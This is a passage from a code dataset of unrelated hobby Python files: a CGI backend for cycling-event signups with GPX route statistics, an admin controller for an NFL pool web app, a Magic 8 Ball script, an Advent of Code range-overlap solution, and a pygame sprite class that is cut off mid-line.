get_json(form[\"ride\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"signup\":\n signup(form[\"ride\"].value,form[\"route\"].value, form[\"name\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"getroute\":\n get_route(form[\"ride\"].value,form[\"route\"].value)\n\n elif form[\"action\"].value == \"withdraw\":\n withdraw(form[\"ride\"].value,form[\"route\"].value, form[\"guid\"].value)\n\n elif form[\"action\"].value == \"withdrawadmin\":\n withdrawadmin(form[\"ride\"].value,form[\"route\"].value, form[\"guid\"].value, form[\"name\"].value, form[\"admin\"].value)\n\n elif form[\"action\"].value == \"validate_admin\":\n validate_admin(form[\"ride\"].value,form[\"admin\"].value)\n\n elif form[\"action\"].value == \"new_route\":\n add_edit_route(form)\n\n elif form[\"action\"].value == \"delete_route\":\n delete_route(form[\"ride\"].value,form[\"admin\"].value, form[\"route\"].value)\n\n elif form[\"action\"].value == \"newevent\":\n new_event(form[\"title\"].value,form[\"date\"].value)\n\n else:\n print(\"Didn't understand action \"+form[\"action\"].value)\n\n\n\ndef new_event(title,date):\n \"\"\"\n Creates a new event and puts it into the database\n \"\"\"\n\n ride = {\n \"ride_id\": generate_id(10),\n \"admin_id\": generate_id(10), \n \"name\": title,\n \"date\": date,\n \"routes\" : []\n }\n\n rides.insert_one(ride)\n\n print(\"Content-type: text/plain; charset=utf-8\\n\\n\"+ride['ride_id']+\" \"+ride['admin_id'], end=\"\")\n\n\ndef generate_id(size):\n \"\"\"\n Generic function used for creating IDs for both\n events and admin authentication\n \"\"\"\n letters = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\n code = \"\"\n\n for _ in range(size):\n code += random.choice(letters)\n\n return code\n\n\ndef delete_route(ride_id,admin_id,route_number):\n \"\"\"\n Completely removes a route from an event including\n the gpx and the signup information.\n \"\"\"\n ride = rides.find_one({\"ride_id\":ride_id})\n\n if ride[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n seen_routes = []\n for i,route in enumerate(ride[\"routes\"]):\n seen_routes.append(str(route[\"number\"]))\n if str(route[\"number\"]) == route_number:\n ride[\"routes\"].pop(i)\n rides.update({\"ride_id\":ride_id},ride)\n\n print(\"Content-type: text/plain; 
charset=utf-8\\n\\nTrue\")\n return\n\n raise Exception(f\"Couldn't find route to remove matching {route_number} checked {seen_routes}\")\n \n\ndef add_edit_route(form):\n \"\"\"\n This same function is used to either edit an existing\n route or add a new one. If they supply a route_number\n then they're editing rather than adding.\n \"\"\"\n\n ride = rides.find_one({\"ride_id\":form[\"ride_id\"].value})\n\n if ride[\"admin_id\"] != form[\"admin_id\"].value:\n raise Exception(\"Invalid admin id for ride\")\n\n # See if they supplied an existing route number\n if form[\"route_number\"].value:\n existing_number = int(form[\"route_number\"].value)\n # We're editing an existing route\n for route in ride[\"routes\"]:\n number = int(route[\"number\"])\n if number == existing_number:\n # This is the route we're editing\n route = route\n route[\"name\"] = form[\"title\"].value\n route[\"description\"] = form[\"description\"].value\n route[\"start_time\"] = form[\"start\"].value\n route[\"departs\"] = form[\"departs\"].value\n route[\"pace\"] = form[\"pace\"].value\n route[\"stop\"] = form[\"stop\"].value\n route[\"leader\"] = form[\"leader\"].value\n route[\"spaces\"] = form[\"spaces\"].value\n\n # If they supplied a gpx file we need to add \n # the data from that too.\n # If there's no file then it will just be a \n # string here\n # raise Exception(f\"gpx is {type(form['gpx'].value)}\")\n if not isinstance(form['gpx'].value,str):\n gpx_file = form[\"gpx\"]\n gpx = gpx_file.file.read().decode(\"UTF-8\")\n lat,lon,distance, elevation = get_stats_from_gpx(gpx)\n route[\"gpx\"] = gpx\n route[\"lat\"] = str(lat)\n route[\"lon\"] = str(lon)\n route[\"distance\"] = round(distance,3)\n route[\"elevation\"] = round(elevation,3)\n \n break\n\n else:\n highest_route = 0\n for route in ride[\"routes\"]:\n number = int(route[\"number\"])\n if number > highest_route:\n highest_route = number\n\n \n highest_route += 1\n\n gpx_file = form[\"gpx\"]\n gpx = gpx_file.file.read().decode(\"UTF-8\")\n\n lat,lon,distance,elevation = get_stats_from_gpx(gpx)\n\n new_route = {\n \"number\": str(highest_route),\n \"name\": form[\"title\"].value,\n \"description\" : form[\"description\"].value,\n \"start_time\": form[\"start\"].value,\n \"departs\": form[\"departs\"].value,\n \"distance\": round(distance,3),\n \"elevation\": round(elevation,3),\n \"pace\": form[\"pace\"].value,\n \"stop\": form[\"stop\"].value,\n \"leader\": form[\"leader\"].value,\n \"spaces\": form[\"spaces\"].value,\n \"gpx\": gpx,\n \"lat\": str(lat),\n \"lon\": str(lon),\n \"joined\" : []\n }\n\n ride[\"routes\"].append(new_route)\n\n rides.update({\"ride_id\":form[\"ride_id\"].value},ride)\n\n print(\"Content-type: text/plain; charset=utf-8\\n\\nTrue\")\n\n\ndef get_json(ride_id,guid):\n \"\"\"\n Gets the main JSON document covering the whole event\n and all routes. 
We ask for the guid so we can show the\n rider whether they are signed up for anything, but we \n remove all of the other guids so they don't see other\n people's data.\n \"\"\"\n # We need the user's guid so we can only\n # return their guids in the answer\n json_content = rides.find_one({\"ride_id\":ride_id})\n\n json_content.pop(\"_id\")\n json_content.pop(\"admin_id\")\n\n for route in json_content[\"routes\"]:\n # Hide all guids but the user's own\n for joined in route[\"joined\"]:\n if joined[\"guid\"] != guid:\n joined[\"guid\"] = \"\"\n\n route.pop(\"gpx\")\n\n print(\"Content-type: application/json\\n\")\n\n print(json.dumps(json_content))\n\n\ndef get_route(ride, route_number):\n \"\"\"\n Used for populating the edit route dialog. Gets\n the JSON for a single route, but removes the signup\n information (including guids)\n \"\"\"\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n route.pop(\"joined\")\n print(\"Content-type: application/json\\n\")\n print(json.dumps(route))\n return\n\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n\ndef signup(ride, route_number, name, guid):\n \"\"\"\n Adds a new signup to a ride. The guid must be present\n unless this is being instigated by an admin\n \"\"\"\n\n if guid.strip() == \"\":\n raise Exception(f\"Only admins can sign up riders without a guid\")\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n found_route = True\n already_signed = False\n for joined in route[\"joined\"]:\n if joined[\"guid\"] == guid:\n # They're already signed up\n already_signed = True\n break\n\n if not already_signed and len(route[\"joined\"]) < int(route[\"spaces\"]):\n route[\"joined\"].append({\"guid\":guid, \"name\":name})\n else:\n raise Exception(\"Already signed or route full\")\n \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\ndef withdraw(ride, route_number, guid):\n \"\"\"\n Processes a user-initiated withdrawal. The guid must\n be present and correct. Admins can bypass this with\n the withdrawadmin function which is less picky\n \"\"\"\n\n if guid.strip() == \"\":\n raise Exception(f\"Won't withdraw a blank guid\")\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n new_joined = []\n found_route = True\n for joined in route[\"joined\"]:\n if joined[\"guid\"] != guid:\n new_joined.append(joined)\n\n route[\"joined\"] = new_joined \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\n\ndef withdrawadmin(ride, route_number, guid, name, admin_id):\n \"\"\"\n Processes a withdrawal but here we can allow this for another\n user because they will authenticate as admins. 
This also \n allows removing registrations without a guid (i.e. those made\n by an admin)\n \"\"\"\n\n json_data = rides.find_one({\"ride_id\":ride})\n\n if json_data[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n found_route = False\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n new_joined = []\n found_route = True\n for joined in route[\"joined\"]:\n if joined[\"guid\"] == guid and joined[\"name\"] == name:\n continue\n\n new_joined.append(joined)\n\n route[\"joined\"] = new_joined \n break\n\n if not found_route:\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\n rides.update({\"ride_id\":ride},json_data)\n\n print(f\"Content-type: text/plain; charset=utf-8\\n\\n{route_number}\", end=\"\")\n\n\ndef list_joined_admin(ride, route_number, admin_id):\n \"\"\"\n Gets the json for the signups for a specific\n route. Doesn't redact the guids, but we may\n want to rethink this as it does expose guids\n to any admin of an event you've signed up for\n \"\"\"\n json_data = rides.find_one({\"ride_id\":ride})\n\n if json_data[\"admin_id\"] != admin_id:\n raise Exception(\"Invalid admin id for ride\")\n\n for route in json_data[\"routes\"]:\n if route[\"number\"] == route_number:\n print(\"Content-type: application/json\\n\")\n print(json.dumps(route[\"joined\"]))\n return\n\n raise Exception(f\"Couldn't find route '{route_number}'\")\n\ndef validate_admin(ride, admin):\n \n if rides.find_one({\"ride_id\":ride, \"admin_id\":admin}):\n print(\"Content-type: text/plain; charset=utf-8\\n\\nTrue\")\n\n else:\n raise Exception(f\"Admin IDs didn't match\")\n\n\n\ndef get_gpx(ride_id, route_number):\n ride = rides.find_one({\"ride_id\":ride_id})\n\n for route in ride[\"routes\"]:\n if (route[\"number\"] == route_number):\n print(\"Content-Disposition:attachment;filename=route.gpx\")\n print(\"Content-type: application/gpx+xml\\n\")\n print(route[\"gpx\"])\n return\n\n raise Exception(f\"Couldn't find gpx for ride={ride_id} route={route_number}\")\n\n\ndef get_ics(ride_id, route_number):\n ride = rides.find_one({\"ride_id\":ride_id})\n\n for route in ride[\"routes\"]:\n if (route[\"number\"] == route_number):\n # Create a calendar object\n cal = Calendar()\n event = Event()\n\n\n # We need a datetime string with the \n # year month day hour minute in it\n ymd = [int(x) for x in ride[\"date\"].split(\"-\")]\n hm = [int(x) for x in route[\"start_time\"].split(\":\")]\n\n event.add('dtstart', datetime(ymd[0],ymd[1],ymd[2],hm[0],hm[1],0))\n event.add('dtend', datetime(ymd[0],ymd[1],ymd[2],hm[0]+1,hm[1],0))\n event.add('summary',ride[\"name\"])\n event.add('description',f\"{route['name']} : {route['description']}\\nDeparting {route['departs']}\")\n\n cal.add_component(event)\n\n print(\"Content-type: text/calendar; charset=utf-8\\n\")\n print(cal.to_ical().decode(\"utf-8\"))\n return\n\n raise Exception(f\"Couldn't find ics for ride={ride_id} route={route_number}\")\n\n\n\n\ndef get_stats_from_gpx(gpx_data):\n\n # Open XML document using minidom parser\n DOMTree = xml.dom.minidom.parseString(gpx_data)\n collection = DOMTree.documentElement\n\n points = collection.getElementsByTagName(\"trkpt\")\n\n lat_max = 0\n lat_min = 0\n lon_max = 0\n lon_min = 0\n\n last_lat = 0\n last_lon = 0\n\n distance = 0\n\n # Our elevation calculation is pretty crude. 
We're just\n # using the elevation markers in the GPS file, which isn't \n # ideal but is the best we can do without additional external\n # information.\n elevation = 0\n\n last_elevation = 0\n\n for i,point in enumerate(points):\n this_lat = float(point.getAttribute(\"lat\"))\n this_lon = float(point.getAttribute(\"lon\"))\n this_elevation = float(point.getElementsByTagName(\"ele\")[0].firstChild.data)\n\n\n if i==0:\n lat_max = this_lat\n lat_min = this_lat\n lon_max = this_lon\n lon_min = this_lon\n\n else:\n if this_lat > lat_max:\n lat_max = this_lat\n if this_lat < lat_min:\n lat_min = this_lat\n if this_lon > lon_max:\n lon_max = this_lon\n if this_lon < lon_min:\n lon_min = this_lon\n\n # Calculate the distance from the last\n # point to this one\n p = pi/180\n a = 0.5 - cos((this_lat-last_lat)*p)/2 + cos(last_lat*p) * cos(this_lat*p) * (1-cos((this_lon-last_lon)*p))/2\n distance += 12742 * asin(sqrt(a))\n\n \n # Add any elevation gain (skip the first point, which has no predecessor)\n if i > 0 and this_elevation > last_elevation:\n elevation += this_elevation - last_elevation\n\n\n last_lat = this_lat\n last_lon = this_lon\n last_elevation = this_elevation\n\n\n mid_lat = (lat_min+lat_max)/2\n mid_lon = (lon_min+lon_max)/2\n\n\n return(mid_lat,mid_lon,distance, elevation)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"s-andrews/cyclewithme","sub_path":"cgi-bin/cwm_backend.py","file_name":"cwm_backend.py","file_ext":"py","file_size_in_byte":15503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"221735467","text":"import pyramid_handlers\nfrom nflpool.controllers.base_controller import BaseController\nfrom nflpool.viewmodels.newinstallviewmodel import NewInstallViewModel\nfrom nflpool.viewmodels.newseasonviewmodel import NewSeasonViewModel\nfrom nflpool.viewmodels.update_nflplayers_viewmodel import UpdateNFLPlayersViewModel\nfrom nflpool.services.new_install_service import NewInstallService\nfrom nflpool.services.new_season_service import NewSeasonService\nfrom nflpool.services.activeplayers_service import ActivePlayersService\nfrom nflpool.viewmodels.update_nflschedule_viewmodel import UpdateNFLScheduleViewModel\nfrom nflpool.services.update_nflschedule_service import UpdateScheduleService\nfrom nflpool.data.account import Account\nfrom nflpool.data.dbsession import DbSessionFactory\nfrom nflpool.services.admin_service import AccountService\nfrom nflpool.viewmodels.update_weekly_stats_viewmodel import UpdateWeeklyStats\nfrom nflpool.services.weekly_msf_data import WeeklyStatsService\nfrom nflpool.viewmodels.update_unique_picks_viewmodel import UniquePicksViewModel\nfrom nflpool.services.unique_picks_service import UniquePicksService\nfrom nflpool.services.standings_service import StandingsService\nfrom nflpool.viewmodels.admin_update_viewmodel import AdminViewModel\nfrom nflpool.data.seasoninfo import SeasonInfo\nfrom nflpool.data.teaminfo import TeamInfo\nfrom nflpool.data.weekly_team_stats import WeeklyTeamStats\nfrom nflpool.services.time_service import TimeService\n\n\nclass AdminController(BaseController):\n @pyramid_handlers.action(renderer=\"templates/admin/index.pt\")\n def index(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n try:\n season_row = (\n session.query(SeasonInfo.current_season)\n 
.filter(SeasonInfo.id == \"1\")\n .first()\n )\n season = season_row.current_season\n\n return {\"season\": season}\n\n except AttributeError:\n self.redirect(\"/admin/new_season\")\n\n # GET /admin/new_install\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_install.pt\",\n request_method=\"GET\",\n name=\"new_install\",\n )\n def new_install_get(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = NewInstallViewModel()\n return vm.to_dict()\n\n # POST /admin/new_install\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_install.pt\",\n request_method=\"POST\",\n name=\"new_install\",\n )\n def new_install_post(self):\n vm = NewInstallViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert team info\n NewInstallService.get_team_info()\n NewInstallService.create_division_info()\n NewInstallService.create_conference_info()\n NewInstallService.create_pick_types()\n NewInstallService.create_pick_type_points()\n\n # redirect\n self.redirect(\"/admin/update_nflplayers\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_season.pt\",\n request_method=\"GET\",\n name=\"new_season\",\n )\n def new_season_get(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = NewSeasonViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/new_season.pt\",\n request_method=\"POST\",\n name=\"new_season\",\n )\n def new_season_post(self):\n vm = NewSeasonViewModel()\n vm.from_dict(self.request.POST)\n\n NewSeasonService.create_season(vm.new_season_input)\n AccountService.reset_paid()\n\n # redirect - See if TeamInfo has data, if not do new_install\n session = DbSessionFactory.create_session()\n team_info_query = session.query(TeamInfo.conference_id).first()\n\n if team_info_query is None:\n self.redirect(\"/admin/new_install\")\n\n else:\n self.redirect(\"/admin/update_nflplayers\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflplayers.pt\",\n request_method=\"GET\",\n name=\"update_nflplayers\",\n )\n def update_nfl_players(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateNFLPlayersViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflplayers.pt\",\n request_method=\"POST\",\n name=\"update_nflplayers\",\n )\n def update_nfl_players_post(self):\n vm = UpdateNFLPlayersViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert NFLPlayer info\n ActivePlayersService.add_active_nflplayers(\n vm.firstname, vm.lastname, vm.player_id, vm.team_id, vm.position, vm.season\n )\n\n # redirect\n self.redirect(\"/admin/update_nflschedule\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflschedule.pt\",\n request_method=\"GET\",\n name=\"update_nflschedule\",\n )\n def 
update_nfl_schedule(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateNFLScheduleViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update_nflschedule.pt\",\n request_method=\"POST\",\n name=\"update_nflschedule\",\n )\n def update_nfl_schedule_post(self):\n vm = UpdateNFLScheduleViewModel()\n vm.from_dict(self.request.POST)\n\n # Insert NFL Schedule\n UpdateScheduleService.update_nflschedule(\n vm.game_id, vm.game_date, vm.away_team, vm.home_team, vm.week, vm.season\n )\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/account-list.pt\",\n request_method=\"GET\",\n name=\"account-list\",\n )\n def list_accounts(self):\n\n # Show list of accounts\n account_list = AccountService.get_all_accounts()\n\n return {\"account_list\": account_list}\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-weekly-stats.pt\",\n request_method=\"GET\",\n name=\"update-weekly-stats\",\n )\n def update_weekly_stats(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UpdateWeeklyStats()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-weekly-stats.pt\",\n request_method=\"POST\",\n name=\"update-weekly-stats\",\n )\n def update_weekly_stats_post(self):\n vm = UpdateWeeklyStats()\n vm.from_dict(self.request.POST)\n\n session = DbSessionFactory.create_session()\n\n week = TimeService.get_week()\n\n season_row = session.query(SeasonInfo).filter(SeasonInfo.id == \"1\").first()\n season = season_row.current_season\n\n row = (\n session.query(WeeklyTeamStats.week)\n .filter(WeeklyTeamStats.season == season)\n .order_by(WeeklyTeamStats.week.desc())\n .first()\n )\n\n # Check if the stats have already been updated for the week and, if so, redirect\n # Try / Except to determine if it's Week 1 (Week would be empty resulting in a TypeError NoneType)\n try:\n\n if row[0] == week or week >= 18:\n self.redirect(\"/admin/stats_already_ran\")\n\n else:\n # Insert weekly team and player stats\n WeeklyStatsService.get_qb_stats()\n WeeklyStatsService.get_rb_stats()\n WeeklyStatsService.get_rec_stats()\n WeeklyStatsService.get_sack_stats()\n WeeklyStatsService.get_interception_stats()\n WeeklyStatsService.get_rankings()\n WeeklyStatsService.get_points_for()\n WeeklyStatsService.get_tiebreaker()\n StandingsService.update_player_pick_points()\n StandingsService.update_team_pick_points()\n\n # redirect on finish\n self.redirect(\"/admin\")\n\n except TypeError:\n # Insert weekly team and player stats\n WeeklyStatsService.get_qb_stats()\n WeeklyStatsService.get_rb_stats()\n WeeklyStatsService.get_rec_stats()\n WeeklyStatsService.get_sack_stats()\n WeeklyStatsService.get_interception_stats()\n WeeklyStatsService.get_rankings()\n WeeklyStatsService.get_points_for()\n WeeklyStatsService.get_tiebreaker()\n StandingsService.update_player_pick_points()\n StandingsService.update_team_pick_points()\n\n # redirect on finish\n self.redirect(\"/admin\")\n\n 
@pyramid_handlers.action(\n renderer=\"templates/admin/update-unique-picks.pt\",\n request_method=\"GET\",\n name=\"update-unique-picks\",\n )\n def update_unique_picks(self):\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n vm = UniquePicksViewModel()\n return vm.to_dict()\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-unique-picks.pt\",\n request_method=\"POST\",\n name=\"update-unique-picks\",\n )\n def update_unique_picks_post(self):\n vm = UniquePicksViewModel()\n vm.from_dict(self.request.POST)\n\n # Find all unique picks for each player\n # team type picks\n picktype = 1\n conf = 0\n div = 1\n\n while conf < 2:\n rank = 1\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n rank = 2\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n rank = 4\n UniquePicksService.unique_team_picks(picktype, conf, div, rank)\n div += 1\n if div > 4:\n div = 1\n conf += 1\n\n picktype = 9\n conf = 0\n UniquePicksService.unique_team_picks(picktype, conf)\n conf = 1\n UniquePicksService.unique_team_picks(picktype, conf)\n\n picktype = 10\n UniquePicksService.unique_team_picks(picktype)\n\n picktype = 4\n conf = 0\n while picktype < 9:\n UniquePicksService.unique_player_picks(picktype, conf)\n conf += 1\n if conf > 1:\n picktype += 1\n conf = 0\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-paid.pt\",\n request_method=\"GET\",\n name=\"update-paid\",\n )\n def payment(self):\n \"\"\"Update if a player has paid the season fee.\"\"\"\n vm = AdminViewModel()\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n player_list = AccountService.get_all_accounts()\n\n session.close()\n\n return {\"players\": player_list}\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-paid\",\n request_method=\"POST\",\n name=\"update-paid\",\n )\n def update_paid(self):\n \"\"\"POST request to update if a NFLPool player has paid the season fee.\"\"\"\n vm = AdminViewModel()\n vm.from_dict(self.request.POST)\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n AccountService.update_paid(vm.user_id)\n\n session.close()\n\n # redirect\n self.redirect(\"/admin\")\n\n @pyramid_handlers.action(\n renderer=\"templates/admin/update-admin.pt\",\n request_method=\"GET\",\n name=\"update-admin\",\n )\n def make_admin(self):\n \"\"\"GET request to make a pool player an administrator.\"\"\"\n vm = AdminViewModel()\n\n session = DbSessionFactory.create_session()\n su__query = (\n session.query(Account.id)\n .filter(Account.is_super_user == 1)\n .filter(Account.id == self.logged_in_user_id)\n .first()\n )\n\n if su__query is None:\n print(\"You must be an administrator to view this page\")\n self.redirect(\"/home\")\n\n pool_player_list = 
AccountService.get_all_accounts()\n\n        session.close()\n\n        return {\"players\": pool_player_list}\n\n    @pyramid_handlers.action(\n        renderer=\"templates/admin/update-admin\",\n        request_method=\"POST\",\n        name=\"update-admin\",\n    )\n    def update_admin(self):\n        \"\"\"POST request to update the database to make a pool player an administrator.\"\"\"\n        vm = AdminViewModel()\n        vm.from_dict(self.request.POST)\n\n        session = DbSessionFactory.create_session()\n        su__query = (\n            session.query(Account.id)\n            .filter(Account.is_super_user == 1)\n            .filter(Account.id == self.logged_in_user_id)\n            .first()\n        )\n\n        if su__query is None:\n            print(\"You must be an administrator to view this page\")\n            self.redirect(\"/home\")\n\n        AccountService.update_admin(vm.user_id)\n\n        session.close()\n\n        # redirect\n        self.redirect(\"/admin\")\n\n    @pyramid_handlers.action(\n        renderer=\"templates/admin/stats_already_ran.pt\",\n        request_method=\"GET\",\n        name=\"stats_already_ran\",\n    )\n    def stats_already_ran(self):\n        session = DbSessionFactory.create_session()\n        su__query = (\n            session.query(Account.id)\n            .filter(Account.is_super_user == 1)\n            .filter(Account.id == self.logged_in_user_id)\n            .first()\n        )\n\n        if su__query is None:\n            print(\"You must be an administrator to view this page\")\n            self.redirect(\"/home\")\n\n        return {}\n","repo_name":"prcutler/nflpool","sub_path":"nflpool/controllers/admin_controller.py","file_name":"admin_controller.py","file_ext":"py","file_size_in_byte":16376,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"24882649346","text":"import random\n\nwhile(input(\"input something:\")):\n    messages = [ 'It is certain', \n                'It is decidedly so',\n                'Yes definitely',\n                'Reply hazy try again',\n                'Ask again later',\n                'Concentrate and ask again',\n                'My reply is no',\n                'Outlook not so good',\n                'Very doubtful']\n\n    print(messages[random.randint(0,len(messages) - 1)])\n","repo_name":"libaiyu/PE_mark","sub_path":"py_lby/cmdtofile/magic8Ball2.py","file_name":"magic8Ball2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15577648886","text":"from typing import TextIO, Generator\nimport re\nfrom sys import stdin\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass SimpleRange:\n    start: int\n    end: int\n\n    def __contains__(self, other: \"SimpleRange\"):\n        return self.start >= other.start and self.end <= other.end\n\n    def overlaps(self, other: \"SimpleRange\") -> bool:\n        if self.start <= other.start:\n            left = self\n            right = other\n        else:\n            left = other\n            right = self\n        return right.start <= left.end or right in left\n\n\n_input_regex = re.compile(r\"(\\d+)-(\\d+),(\\d+)-(\\d+)\")\n\n\ndef ranges_from_file(\n    input_file: TextIO,\n) -> Generator[tuple[SimpleRange, SimpleRange], None, None]:\n    for line in input_file:\n        start1, end1, start2, end2 = _input_regex.match(line).groups()\n        yield SimpleRange(int(start1), int(end1)), SimpleRange(int(start2), int(end2))\n\n\ndef contains_symmetric(range1: SimpleRange, range2: SimpleRange) -> bool:\n    return range1 in range2 or range2 in range1\n\n\ndef solution(input_file: TextIO) -> int:\n    return sum(contains_symmetric(*r) for r in ranges_from_file(input_file))\n\n\nif __name__ == \"__main__\":\n    
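# Worked illustration (hedged; example values, not puzzle input): note that\n    # SimpleRange.__contains__ tests whether *self* lies inside *other*, so\n    # \"a in b\" reads as \"b fits inside a\". contains_symmetric checks both\n    # directions, which is why the pair \"2-8,3-7\" counts as fully contained\n    # while \"2-4,6-8\" does not.\n    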
print(solution(stdin))\n","repo_name":"NoxMar/aoc-2022-python","sub_path":"noxmar_aoc_2022/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7606266850","text":"import pygame\npygame.init\n\nclass sprite(pygame.sprite.Sprite):\n def __init__(self,imagen,x = 0,y = 0,rectangles = False):\n \n self.imagen = imagen\n self.originalImagen = self.imagen\n \n self.rect = self.imagen.get_rect()\n self.rects = []\n \n if rectangles != False:\n for x in range(len(rectangles)):\n self.rects.append(pygame.rect.Rect((rectangles[x][0],rectangles[x][1],rectangles[x][2],rectangles[x][3])))\n \n for num in range(len(self.rects)):\n x = self.rects[num].left\n y = self.rects[num].top\n h = self.rects[num].height\n w = self.rects[num].width\n #pygame.draw.lines(self.imagen,(200,100,200),True,((x,y),(x+w,y),(x+w,y+h),(x,y+h)),2)\n \n self.x = x\n self.y = y\n self.t = self.imagen.get_size()\n def cambiarXY(self,x,y):\n self.x = x\n self.y = y\n def moverIP(self,x,y):\n self.x+=x\n self.y+=y\n def aumentarTamanio(self,escala):\n actual1,actual2 = self.t\n self.imagen = pygame.transform.scale(self.imagen,(int(actual1*escala),int(actual2*escala)))\n self.t = self.imagen.get_size()\n def devolverPintadoEscala(self,escala,pantalla): \n actual1,actual2 = self.t\n escalaImage = pygame.transform.scale(self.imagen,(int(actual1*escala),int(actual2*escala))) \n h,w = int(actual1*escala),int(actual2*escala)\n top = self.y -w/2\n left = self.x -h/2\n pantalla.blit(escalaImage,(left,top))\n def setearHW(self,h,w):\n self.imagen = pygame.transform.scale(self.imagen,(int(h),int(w)))\n def devolverRotada(self,angulo,pantalla):\n \n rotadaImage = pygame.transform.rotate(self.originalImagen,angulo) \n actual1,actual2 = rotadaImage.get_size() \n h,w = int(actual1),int(actual2)\n top = self.y -w/2\n left = self.x -h/2\n pantalla.blit(rotadaImage,(left,top))\n def pintar(self,pantalla):\n actual1,actual2 = self.t\n self.rect.top = self.y -actual2/2\n self.rect.left = self.x -actual1/2\n pantalla.blit(self.imagen,self.rect)\n def cambiarImagen(self,nuevaImagen):\n self.imagen = nuevaImagen\n self.rect = self.imagen.get_rect()\n def generarRotados(self):\n \n self.rotados = []\n for x in range(-90,90):\n imagen = 